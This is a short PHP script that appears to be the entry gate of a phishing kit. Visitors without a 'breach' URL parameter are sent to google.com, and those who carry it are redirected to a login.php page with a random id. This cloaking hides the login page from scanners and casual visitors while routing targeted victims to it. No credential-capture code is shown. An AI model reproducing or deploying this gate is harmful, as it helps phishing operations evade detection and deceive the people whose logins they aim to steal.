<?php 

if (!isset($_GET['breach'])) {
    header('location: https://www.google.com');
    die();
}

header('location: login.php?_id=' . rand(10009, 99999));
exit;